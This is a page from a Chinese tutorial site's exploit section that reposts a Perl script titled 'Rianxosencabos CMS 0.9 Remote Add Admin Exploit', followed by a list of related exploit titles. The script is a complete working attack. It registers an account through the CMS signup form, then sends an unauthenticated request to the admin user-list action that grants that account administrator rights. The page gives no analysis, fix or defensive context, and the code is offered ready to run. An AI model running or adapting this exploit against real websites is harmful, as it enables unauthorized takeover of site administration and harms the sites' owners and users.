手机
当前位置:查字典教程网 >网络安全 >Exploit >Rianxosencabos CMS 0.9 Remote Add Admin Exploit
Rianxosencabos CMS 0.9 Remote Add Admin Exploit
摘要:#!/usr/bin/perl-w#RianxosencabosCMS0.9RemoteAddAdminExploit#Download:h...

#!/usr/bin/perl -w # Rianxosencabos CMS 0.9 Remote Add Admin Exploit

# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz # written by ka0x <ka0x01 [at] gmail [dot] com>

# D.O.M Labs - Security Researchers

# - www.domlabs.org - use LWP::UserAgent; my ($host, $login, $pass, $mail, $user_id) = @ARGV ; unless($ARGV[4]){

print "[*] usage: perl $0 <host> <login> <pass> <mail> <user_id>n";

print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2n";

exit 1;

} if ($host !~ /^http:/){ $host = 'http://'.$host; } my $ua = LWP::UserAgent->new() or die ;

$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ;

$ua->timeout(10) ; sub __CREATE { my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ;

$req->content_type('application/x-www-form-urlencoded') ;

$req->content("reg_login=".$login."&reg_pass=".$pass."&reg_repass=".$pass."&reg_nombre=".$login."&reg_mail=".$mail."&submit_register=Rexistrar") ; my $res = $ua->request($req) ;

my $location = $res->header('Location') ;

if ($location =~ /Usuario creado/i) {

print "[ ] user added: ".$login ;

print "n[ ] password: ".$pass, "n" ;

} else{

print "[-] Exploit Failed!n" ;

}

} &__CREATE ; sub __ADMIN {

my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; $req->content_type('application/x-www-form-urlencoded') ; $req->content($user_id."=0&inputOculto=".$user_id) ; $ua->request($req) ;

} &__ADMIN ;

__END__

【Rianxosencabos CMS 0.9 Remote Add Admin Exploit】相关文章:

FreeBSD mcweject 0.9 (eject) Local Root Buffer Overflow Exploit

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Joomla Component EZ Store Remote Blind SQL Injection Exploit

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

TGS CMS 0.3.2r2 Remote Code Execution Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Yourownbux 4.0 (COOKIE) Authentication Bypass Exploit

上一篇: iGaming CMS
精品推荐
分类导航